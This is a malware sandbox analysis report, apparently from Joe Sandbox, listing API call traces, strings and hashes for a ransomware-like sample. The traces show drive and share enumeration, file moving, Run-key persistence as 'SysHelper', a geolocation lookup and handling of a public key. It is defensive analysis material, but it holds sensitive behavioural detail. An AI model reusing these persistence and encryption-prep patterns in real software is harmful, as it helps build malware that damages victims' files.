                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(00000000), ref: 002F2248
                                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 002F2256
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 002F226A
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 002F2275
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 002F2280
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Psapi.dll), ref: 002F2291
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 002F229F
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 002F22AA
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 002F22B5
                                                                                                                                                                        • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 002F22CD
                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 002F22FE
                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 002F2315
                                                                                                                                                                        • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 002F232C
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002F2347
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                                                                                        • API String ID: 3668891214-3807497772
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • timeGetTime.WINMM ref: 002FF15E
                                                                                                                                                                        • Sleep.KERNEL32(?), ref: 002FF185
                                                                                                                                                                        • Sleep.KERNEL32(?), ref: 002FF19D
                                                                                                                                                                        • SendMessageW.USER32(?,00008003,00000000,00000000), ref: 002FF9D0
                                                                                                                                                                          • Part of subcall function 002F0A50: GetLogicalDrives.KERNEL32 ref: 002F0A75
                                                                                                                                                                          • Part of subcall function 002F0A50: SetErrorMode.KERNEL32(00000001,003E0234,00000002), ref: 002F0AE2
                                                                                                                                                                          • Part of subcall function 002F0A50: PathFileExistsA.SHLWAPI(?), ref: 002F0AF9
                                                                                                                                                                          • Part of subcall function 002F0A50: SetErrorMode.KERNEL32(00000000), ref: 002F0B02
                                                                                                                                                                          • Part of subcall function 002F0A50: GetDriveTypeA.KERNEL32(?), ref: 002F0B1B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorModeSleep$DriveDrivesExistsFileLogicalMessagePathSendTimeTypetime
                                                                                                                                                                        • String ID: C:\
                                                                                                                                                                        • API String ID: 3672571082-3404278061
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 002ECF4A
                                                                                                                                                                        • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 002ECF5F
                                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 002ECFA6
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00002800,?), ref: 002ECFCD
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 002ECFDA
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 002ECFDD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                                                                                        • String ID: $"country_code":"$$$($Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                                                                                        • API String ID: 1485416377-933853286
                                                                                                                                                                        • Opcode ID: 26ee304c64c475d326b71aa3371a4fcd77ee24a3fa4f5a4fc9e844275d735708
                                                                                                                                                                        • Instruction ID: caba66b44eb90439a72649646cdab5782e9f66e3aec398a23133c87a1203b006
                                                                                                                                                                        • Opcode Fuzzy Hash: 26ee304c64c475d326b71aa3371a4fcd77ee24a3fa4f5a4fc9e844275d735708
                                                                                                                                                                        • Instruction Fuzzy Hash: 5891D070C50299DBEF25CFA1CC45BEEBBB8AF05304F604168E4097B281D7B25A98CF51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        APIs
                                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 002FBB49
                                                                                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 002FBBBA
                                                                                                                                                                        • _malloc.LIBCMT ref: 002FBBE4
                                                                                                                                                                        • GetComputerNameW.KERNEL32(00000000,?), ref: 002FBBF4
                                                                                                                                                                        • _free.LIBCMT ref: 002FBCD7
                                                                                                                                                                          • Part of subcall function 002F1CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,003AAC68,000000FF), ref: 002F1D12
                                                                                                                                                                          • Part of subcall function 002F1CD0: _memset.LIBCMT ref: 002F1D3B
                                                                                                                                                                          • Part of subcall function 002F1CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 002F1D63
                                                                                                                                                                          • Part of subcall function 002F1CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,003AAC68,000000FF), ref: 002F1D6C
                                                                                                                                                                          • Part of subcall function 002F1CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 002F1DD6
                                                                                                                                                                          • Part of subcall function 002F1CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 002F1E48
                                                                                                                                                                        • IsWindow.USER32(?), ref: 002FBF69
                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 002FBF7B
                                                                                                                                                                        • DefWindowProcW.USER32(?,00008003,?,?), ref: 002FBFA8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3873257347-0
                                                                                                                                                                        • Opcode ID: 6f26a9af64924aca7e6f364f6b1c1911853d7b8f5522461d3fe6e1abdffd5df5
                                                                                                                                                                        • Instruction ID: fed0b7d7d432bbb25bb02eb9b0046608666b1b288c0e6d22b171a327c335a199
                                                                                                                                                                        • Opcode Fuzzy Hash: 6f26a9af64924aca7e6f364f6b1c1911853d7b8f5522461d3fe6e1abdffd5df5
                                                                                                                                                                        • Instruction Fuzzy Hash: A3C1EE715283489FDB22DF24DC05B6AFBE4BF85354F104A2CF988972A1D7759824CF52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00300FDD: __wfsopen.LIBCMT ref: 00300FE8
                                                                                                                                                                        • _fgetws.LIBCMT ref: 002EC7BC
                                                                                                                                                                        • _memmove.LIBCMT ref: 002EC89F
                                                                                                                                                                        • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 002EC94B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                                                                        • API String ID: 2864494435-54166481
                                                                                                                                                                        • Opcode ID: f0b8e0fd2ac4f7ecca23973f4be2395a0830663cab163be1f7376a5d070d1046
                                                                                                                                                                        • Instruction ID: 6e8bfda4566311ad9c3c4e9222c815743aa82484fe0240dd741411c0752e853b
                                                                                                                                                                        • Opcode Fuzzy Hash: f0b8e0fd2ac4f7ecca23973f4be2395a0830663cab163be1f7376a5d070d1046
                                                                                                                                                                        • Instruction Fuzzy Hash: D1910372D5034A9BCF21DFA5CC857EEB7B4BF04304F64012AE815A7281E775AE25CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,002FE6D4), ref: 002EC6C2
                                                                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 002EC6F3
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 002EC700
                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 002EC725
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 002EC72E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseValue$OpenQuery
                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                                                                                        • API String ID: 3962714758-1667468722
                                                                                                                                                                        • Opcode ID: 7be261611c7d912ccffd6ba265deec5eba144c63b5193395774e1483e99e582d
                                                                                                                                                                        • Instruction ID: 3b070650a1401e5de002aa689e3d119f5fb3044c2ccbe2988dbb381f59a411b7
                                                                                                                                                                        • Opcode Fuzzy Hash: 7be261611c7d912ccffd6ba265deec5eba144c63b5193395774e1483e99e582d
                                                                                                                                                                        • Instruction Fuzzy Hash: A8111B75940208FBDB11DF90DC46BEEBBBCEB04704F104195EA01B22A1D7B15A14AA50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 002FE707
                                                                                                                                                                          • Part of subcall function 002EC500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 002EC51B
                                                                                                                                                                        • InternetOpenW.WININET ref: 002FE743
                                                                                                                                                                        • _wcsstr.LIBCMT ref: 002FE7AE
                                                                                                                                                                        • _memmove.LIBCMT ref: 002FE838
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 002FE90A
                                                                                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 002FE93D
                                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 002FE954
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 002FE96F
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002FE98C
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 002FE9A3
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 002FE9CD
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 002FE9F3
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 002FE9F6
                                                                                                                                                                        • _strstr.LIBCMT ref: 002FEA36
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002FEA59
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 002FEA74
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 002FEA82
                                                                                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 002FEA92
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 002FEAA4
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 002FEABA
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 002FEAC8
                                                                                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 002FEAE3
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 002FEB5B
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 002FEB7C
                                                                                                                                                                        • _malloc.LIBCMT ref: 002FEB86
                                                                                                                                                                        • _memset.LIBCMT ref: 002FEB94
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 002FEBAE
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 002FEBB6
                                                                                                                                                                        • _strstr.LIBCMT ref: 002FEBDA
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002FEC00
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 002FEC24
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 002FEC32
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                                                                                        • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                                                                                        • API String ID: 2805819797-1771568745
                                                                                                                                                                        • Opcode ID: 21e41f05db8e6cb3235eee6b502a079510cbef7538ea061d7d7947da9d35fb83
                                                                                                                                                                        • Instruction ID: 2931cdc0a2376392801e2298e99729cf588b5d61f28e93b1d5d62f2fb735c0c8
                                                                                                                                                                        • Opcode Fuzzy Hash: 21e41f05db8e6cb3235eee6b502a079510cbef7538ea061d7d7947da9d35fb83
                                                                                                                                                                        • Instruction Fuzzy Hash: 0C019230558389AADB32DF209C05BEBBBDDAF51744F444828FA84D2182EB749218CB53
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • timeGetTime.WINMM(?,?,?,?,002FEE2F), ref: 002F1B1E
                                                                                                                                                                        • timeGetTime.WINMM(?,?,002FEE2F), ref: 002F1B29
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002F1B4C
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 002F1B5C
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002F1B6A
                                                                                                                                                                        • Sleep.KERNEL32(00000064,?,?,002FEE2F), ref: 002F1B72
                                                                                                                                                                        • timeGetTime.WINMM(?,?,002FEE2F), ref: 002F1B78
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3697694649-0
                                                                                                                                                                        • Opcode ID: 88db38d945f8944db39d10810900220d6143aa6b83b544b93e03811386bb23dd
                                                                                                                                                                        • Instruction ID: ea0ec3c0ac902422435b0f553662ce8f615307e32d690a9d38bf929c0d2e4703
                                                                                                                                                                        • Opcode Fuzzy Hash: 88db38d945f8944db39d10810900220d6143aa6b83b544b93e03811386bb23dd
                                                                                                                                                                        • Instruction Fuzzy Hash: B2017136A5031DEADF20ABA59C45FEDB76CAB08B84F444065E700A71C0E665A9218BA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 002EC51B
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 002EC539
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$AppendFolder
                                                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                                                        • API String ID: 29327785-2616962270
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 002FBAAD
                                                                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 002FBABE
                                                                                                                                                                        • UpdateWindow.USER32(00000000), ref: 002FBAC5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$CreateShowUpdate
                                                                                                                                                                        • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                                                                                        • API String ID: 2944774295-3503800400
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 002F0C12
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00004000), ref: 002F0C39
                                                                                                                                                                        • _memset.LIBCMT ref: 002F0C4C
                                                                                                                                                                        • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 002F0C63
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 364255426-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLogicalDrives.KERNEL32 ref: 002F0A75
                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001,003E0234,00000002), ref: 002F0AE2
                                                                                                                                                                        • PathFileExistsA.SHLWAPI(?), ref: 002F0AF9
                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 002F0B02
                                                                                                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 002F0B1B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2560635915-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 002FB1BA
                                                                                                                                                                          • Part of subcall function 002F11C0: CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 002F120F
                                                                                                                                                                          • Part of subcall function 002F11C0: GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 002F1228
                                                                                                                                                                          • Part of subcall function 002F11C0: CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 002F123D
                                                                                                                                                                          • Part of subcall function 002F11C0: MoveFileW.KERNEL32(00000000,?), ref: 002F1277
                                                                                                                                                                          • Part of subcall function 002FBA10: LoadCursorW.USER32(00000000,00007F00), ref: 002FBA4A
                                                                                                                                                                          • Part of subcall function 002FBA10: RegisterClassExW.USER32(00000030), ref: 002FBA73
                                                                                                                                                                          • Part of subcall function 002FBA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 002FBAAD
                                                                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002FB4B3
                                                                                                                                                                        • TranslateMessage.USER32(?), ref: 002FB4CD
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 002FB4D7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                                                                                        • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                                                                                        • API String ID: 441990211-897913220
                                                                                                                                                                        • Opcode ID: a7f663b808875d0d8abbbcc83d62113e3a5856ceba6647525adbe6b8ce41b32e
                                                                                                                                                                        • Instruction ID: 57e2cd8d146057384e268786594f1ae4739e3ae9df112026228ccbdce0229c90
                                                                                                                                                                        • Opcode Fuzzy Hash: a7f663b808875d0d8abbbcc83d62113e3a5856ceba6647525adbe6b8ce41b32e
                                                                                                                                                                        • Instruction Fuzzy Hash: 455112715342499BC618FB60C9629FEF7A8AF95380F40493DF646431A2EF30962DCF92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 002EEF69
